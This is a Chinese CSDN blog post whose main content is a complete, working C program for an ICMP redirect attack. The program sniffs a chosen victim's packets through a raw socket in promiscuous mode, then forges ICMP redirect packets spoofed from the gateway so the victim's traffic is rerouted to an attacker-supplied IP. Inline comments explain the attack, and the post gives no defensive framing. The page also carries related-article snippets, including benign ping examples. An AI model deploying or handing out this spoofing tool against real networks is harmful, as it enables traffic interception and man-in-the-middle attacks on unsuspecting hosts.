使用Raw Socket实现ICMP重定向

最新推荐文章于 2023-08-03 14:06:13 发布
最新推荐文章于 2023-08-03 14:06:13 发布
阅读量660 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: icmp c语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42785235/article/details/115168801
版权 
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<netinet/ip_icmp.h>
#include<netinet/tcp.h>
#include<netinet/udp.h>
#include<arpa/inet.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<netinet/ether.h>
#define BUFFSIZE 1024

/*
*总体思路:每当用raw socket捕获一个特定IP地址的数据包
*就利用收到的数据包的一部分,构造一个ICMP包,发送给该数据包的源IP地址,同时将发送方的身份修改为网关
*重要提示:请确保自己的机子开启了混杂模式!!!不然很难捕获到受害者的数据包
*/

/*
*ifconfig eth0 promisc 设置eth0为混杂模式。

*ifconfig eth0 -promisc 取消它的混杂模式

*可能需要加sudo
*/

//struct of the packet to be sent
struct packet{
        struct iphdr ip_header;
        struct icmp my_icmp;
}packet;

//计算校验和
unsigned short in_cksum(unsigned short *addr, int len)
{
        int sum=0;
        unsigned short res=0;
        while( len > 1)  {
                sum += *addr++;
                len -=2;
               // printf("sum is %x.\n",sum);
        }
        if( len == 1) {
                *((unsigned char *)(&res))=*((unsigned char *)addr);
                sum += res;
        }
        sum = (sum >>16) + (sum & 0xffff);
        sum += (sum >>16) ;
        res = ~sum;
        return res;
}
int main(int argc,char *argv[]){

	int recvsock;//用于接收以太网帧的socket
	int sendsock;//用于构造重定向ICMP的socket
	unsigned char buff[BUFFSIZE];
	unsigned char* gateway_ip;
	unsigned char* victim_ip;
	unsigned char* attacker_ip;
	if(argc < 4){
		printf("please enter the ip of gateway victim attacker");
		return -1;
	}
	//将命令行参数分别保存给对应IP地址
	gateway_ip = argv[1];
	victim_ip = argv[2];
	attacker_ip = argv[3];

	printf("the victim is %s", victim_ip);

	//the receiver of the ICMP redirect packet 
	struct sockaddr_in dest;
    dest.sin_family=AF_INET;
    dest.sin_addr.s_addr=inet_addr(victim_ip);

	//create the socket for capturing the very packet
	recvsock = socket(AF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
	if(recvsock < 0){
		printf("raw recvsocket error!\n");
		exit(1);
	}
	//create necessary info for capturing the very packet
	// struct sockaddr_in filteraddr;
	// filteraddr.sin_family = AF_INET;
	// filteraddr.sin_port = 0;
	// filteraddr.sin_addr.s_addr = inet_addr(victim_ip);
	// int addr_len=sizeof(struct sockaddr_in);

	//create the sendsock
	sendsock = socket(AF_INET,SOCK_RAW,IPPROTO_ICMP);
	//since we want to send packet as a gateway, we should change the IPheader 
	const int on = 1;
	if(setsockopt(sendsock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(int)) < 0)
	{	
 	 printf("set socket option error!\n");
	}

	int res;
	while(1){
		res = recvfrom(recvsock, buff, BUFFSIZE, 0, NULL, NULL);
		if(res < 0){
		printf("receive error!\n");
		return -2;
		}
		struct ip *ip = (struct ip*)(buff+14);
		if(strcmp(inet_ntoa(ip->ip_src), victim_ip) != 0  ){
			continue;
		}
		printf("\ngot a packet from %s \n", inet_ntoa(ip->ip_src));
		printf("%15s", inet_ntoa(ip->ip_src));
		printf("%15s	%5d	\n",inet_ntoa(ip->ip_dst),ip->ip_p);

		//next, we will create the redirect packet and send to the victim as a gateway continually
		//first, we create the ip header
		struct packet redirect_pack;
		redirect_pack.ip_header.version = 4;
		redirect_pack.ip_header.ihl = 5;// per 4 bytes
		redirect_pack.ip_header.tos = 0;
		redirect_pack.ip_header.tot_len = htons(56);//packet total length
		redirect_pack.ip_header.id = getpid();
		redirect_pack.ip_header.frag_off = 0;
		redirect_pack.ip_header.ttl = 64;
		redirect_pack.ip_header.protocol = IPPROTO_ICMP;
		redirect_pack.ip_header.check = 0; //checksum set 0 ,finally we will get the correct number
		redirect_pack.ip_header.saddr = inet_addr(gateway_ip);
		redirect_pack.ip_header.daddr = inet_addr(victim_ip);
		//then, we create the partion of IP data (ICMP) of the redirect packet
		redirect_pack.my_icmp.icmp_type = ICMP_REDIRECT;
		redirect_pack.my_icmp.icmp_code = ICMP_REDIR_HOST;
		redirect_pack.my_icmp.icmp_cksum = 0;
		redirect_pack.my_icmp.icmp_hun.ih_gwaddr.s_addr = inet_addr(attacker_ip);//here is the very keypoint 
		//we need to pad something with the packet we captured 
		memcpy(&redirect_pack.my_icmp.icmp_dun, ip, 28);//the padding part include the ip header + 8bytes ip data
		//calculate the checksum again
		redirect_pack.ip_header.check = in_cksum(&(redirect_pack.ip_header), sizeof(redirect_pack.ip_header));
		redirect_pack.my_icmp.icmp_cksum = in_cksum(&(redirect_pack.my_icmp), sizeof(redirect_pack.my_icmp)+8);
		//now we can send the icmp redirect packet
		printf("now we are sending the redirect package to victim %s\n", victim_ip);
		sendto(sendsock, &redirect_pack, 56, 0, (struct sockaddr *)&dest, sizeof(dest));
	}
	close(recvsock);
	close(sendsock);


}

 

crazy-joker
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
原生socket使用ICMP协议实现ping单个或多个目标时发生窜包的解决方法
tomwillow的博客
06-24 1857
问题描述 原生socket使用ICMP协议实现ping功能,网上代码很多了,我参考的是这本:王艳平,张越.Windows网络与通信程序设计[M].北京人民邮电出版社,2006。 代码逻辑也很清晰,先构造ICMP包,把当前时间填入timestamp字段,调用sendto发到指定IP,再调用recvfrom接收,然后用当前时间减去接收到的包的timestamp字段,得到ping的时间。 例子里只发了4个包,没有问题。网络通畅时,也没有问题。 我改了下代码,循环向多个ip轮流发包,然后接收。问题就出现了。 pin
chatgpt赋能python:PythonSocketICMP:介绍和其应用
test100t的博客
05-25 143
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
Socket 编程教程
wasb001的专栏
08-23 1701
Socket 编程教程 (一)TCP/IP协议族 1.什么是 TCP/IP? TCP/IP 是供已连接因特网的计算机进行通信的通信协议。TCP/IP 指传输控制协议/网际协议 (Transmission Control Protocol / Internet Protocol)。TCP/IP 定义了电子设备(比如计算机)如何连入因特网,以及数据如何在它们之间传输的标准。 2. TCP/IP
icmp socket
SendRecvDream的专栏
01-05 1965
<br />/*<br />author: duanjigang <duanjigang1983@126.com,duanjigang1983@gmail.com><br />des: a faked ping message to get  loading user names and<br />password of the FTP service from a remote machine,<br />the user names and password are sniffered by our<b
详解Linux中的socket函数
最新发布
m0_61629312的博客
08-03 724
2023年8月3日,周四下午。
icmp.rar_icmp
09-24
1. **套接字创建**:使用`socket()`函数创建一个RAW套接字,因为ICMP报文不是通过TCP或UDP发送的,而是直接在IP层进行。 2. **报文构建**:根据ICMP的结构填充报文,包括设置类型、代码、标识符和序列号等。 3. **...
TCP-IP详解卷2:实现——2
01-23
2.6.6 m_pullup使用总结 40 2.7 mbuf宏和函数的小结 40 2.8 Net/3联网数据结构小结 42 2.9 m_copy和簇引用计数 43 2.10 其他选择 47 2.11 小结 47 第3章 接口层 49 3.1 引言 49 3.2 代码介绍 49 3.2.1 全局变量 49 ...
TCP-IP详解卷2:实现——1
01-23
2.6.6 m_pullup使用总结 40 2.7 mbuf宏和函数的小结 40 2.8 Net/3联网数据结构小结 42 2.9 m_copy和簇引用计数 43 2.10 其他选择 47 2.11 小结 47 第3章 接口层 49 3.1 引言 49 3.2 代码介绍 49 3.2.1 全局变量 49 ...
TCP-IP详解卷二:实现part2
03-30
2.6.6 m_pullup使用总结 40 2.7 mbuf宏和函数的小结 40 2.8 Net/3联网数据结构小结 42 2.9 m_copy和簇引用计数 43 2.10 其他选择 47 2.11 小结 47 第3章 接口层 49 3.1 引言 49 3.2 代码介绍 49 3.2.1 全局变量 49 ...
TCP-IP详解卷二:实现part1
03-30
2.6.6 m_pullup使用总结 40 2.7 mbuf宏和函数的小结 40 2.8 Net/3联网数据结构小结 42 2.9 m_copy和簇引用计数 43 2.10 其他选择 47 2.11 小结 47 第3章 接口层 49 3.1 引言 49 3.2 代码介绍 49 3.2.1 全局变量 49 ...
利用RawSocket实现简单的Ping程序 ICMP协议
12-13
利用RawSocket实现简单的Ping程序 ICMP协议 编程语言 C++ 操作系统 Linux(Ubuntu 10.0) 开发环境(可选)Qt4.7.0
socket编程实现Ping程序
Chester_Carson的博客
12-15 974
通过socket 编程实现ping程序,传参为ip(或者域名)
Qt 实现Ping功能 获取到具体网络延迟的值(不使用Process)
Morris_WCG的博客
04-06 1935
几种Ping是否在线的方法 参考大佬:在C#中 有自带的Ping类可以通过发送主机名或IP地址 获取到ICMP状态和回复时间RoundtripTime(RTT)但在Qt中 没有封装好的Ping类和相关方法(也可能是我没有发现 不会用)通过QProcess可以调用cmd下发ping命令 再解析命令回复"时间=" 但反复调用cmd再解析 容易引发一些故障 且不能跨平台 不够优雅通过上边链接里大佬的第三种方法 建立socket连接 可以判断是否连通 但无法获取到RTT。
linux 程序实现 ping,Linux网络编程篇之ICMP协议分析及ping程序实现
weixin_29609679的博客
05-01 426
Linux网络编程系列:如果对Linux网络编程,对socket通信不是太清楚的同学,强烈推荐看一下上述的预备知识,说不定,就会喜欢上Linux的网络编程世界本系列会尽量对协议的部分进行介绍, 结合简单应用例子进行掌握学习.ping程序功能实现效果展示在这里插入图片描述ping.c程序代码/** @Author: D-lyw* @Date: 2018-11-01 17:00:20* @Last M...
使用 ICMPRAW Sockets实现 ping 类
FrankieWang008的专栏
07-21 2866
[cpp] view plaincopy //   // Ping.h   //      #pragma pack(push)   #pragma pack(1)      #include    #include    #include    #include       class CPing   {     #define ICMP
《趣谈网络协议》学习笔记DAY14
sinat_22180095的博客
02-02 77
知识点3
如何使用 RAW SOCKET 发送 ICMP 消息并解析回应?(
05-24
使用 RAW SOCKET 可以直接访问网络层,因此可以发送和接收 ICMP 消息。以下是一个 C 语言示例代码,演示如何使用 RAW SOCKET 发送 ICMP 消息并解析回应。 首先,我们需要包含必要的头文件: ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <arpa/inet.h> #include <netdb.h> #include <errno.h> ``` 接下来,我们定义一些常量和结构体: ```c // ICMP 包头部长度 #define ICMP_HDRLEN 8 // IP 数据包头部长度 #define IP4_HDRLEN 20 // ICMP 报文类型 #define ICMP_ECHO_REQUEST 8 // 定义 ICMP 报文结构体 struct icmp_packet { struct icmphdr hdr; char msg[64 - ICMP_HDRLEN]; }; // 定义 IP 数据包结构体 struct ip_packet { struct iphdr hdr; struct icmp_packet icmp; }; ``` 然后,我们定义一些辅助函数: ```c // 计算校验和 unsigned short checksum(void *b, int len) { unsigned short *buf = b; unsigned int sum = 0; unsigned short result; for (sum = 0; len > 1; len -= 2) { sum += *buf++; } if (len == 1) { sum += *(unsigned char *) buf; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); result = ~sum; return result; } // 发送 ICMP 消息 int send_icmp(int sock_fd, struct sockaddr_in *dest_addr) { struct ip_packet packet; // 设置 ICMP 包头部 packet.icmp.hdr.type = ICMP_ECHO_REQUEST; packet.icmp.hdr.code = 0; packet.icmp.hdr.checksum = 0; packet.icmp.hdr.un.echo.id = getpid(); packet.icmp.hdr.un.echo.sequence = 1; memset(packet.icmp.msg, 'A', sizeof(packet.icmp.msg)); // 计算 ICMP 包校验和 packet.icmp.hdr.checksum = checksum(&packet.icmp, sizeof(packet.icmp)); // 设置 IP 数据包头部 packet.hdr.version = 4; packet.hdr.ihl = 5; packet.hdr.tos = 0; packet.hdr.id = htons(getpid()); packet.hdr.ttl = 64; packet.hdr.protocol = IPPROTO_ICMP; packet.hdr.saddr = INADDR_ANY; packet.hdr.daddr = dest_addr->sin_addr.s_addr; packet.hdr.tot_len = htons(IP4_HDRLEN + ICMP_HDRLEN); // 发送 ICMP 消息 if (sendto(sock_fd, &packet, sizeof(packet), 0, (struct sockaddr *) dest_addr, sizeof(*dest_addr)) < 0) { perror("sendto"); return -1; } return 0; } // 接收 ICMP 消息 int recv_icmp(int sock_fd, struct sockaddr_in *src_addr) { char buf[2048]; // 接收 ICMP 消息 socklen_t len = sizeof(*src_addr); int ret = recvfrom(sock_fd, buf, sizeof(buf), 0, (struct sockaddr *) src_addr, &len); if (ret < 0) { perror("recvfrom"); return -1; } // 解析 ICMP 消息 struct ip_packet *ip_pkt = (struct ip_packet *) buf; struct icmphdr *icmp_hdr = (struct icmphdr *) (buf + sizeof(struct iphdr)); if (icmp_hdr->type == ICMP_ECHO_REQUEST && icmp_hdr->code == 0) { printf("Received echo reply from %s\n", inet_ntoa(src_addr->sin_addr)); return 0; } return -1; } ``` 最后,我们可以使用这些函数来发送和接收 ICMP 消息: ```c int main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s <IP address>\n", argv[0]); return -1; } // 创建 RAW SOCKET int sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); if (sock_fd < 0) { perror("socket"); return -1; } // 设置目标地址 struct sockaddr_in dest_addr; memset(&dest_addr, 0, sizeof(dest_addr)); dest_addr.sin_family = AF_INET; dest_addr.sin_port = 0; if (inet_pton(AF_INET, argv[1], &dest_addr.sin_addr) <= 0) { perror("inet_pton"); return -1; } // 发送 ICMP 消息 if (send_icmp(sock_fd, &dest_addr) < 0) { return -1; } // 接收 ICMP 消息 struct sockaddr_in src_addr; memset(&src_addr, 0, sizeof(src_addr)); if (recv_icmp(sock_fd, &src_addr) < 0) { return -1; } close(sock_fd); return 0; } ``` 注意,使用 RAW SOCKET 需要 root 权限。此外,防火墙可能会阻止 ICMP 消息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值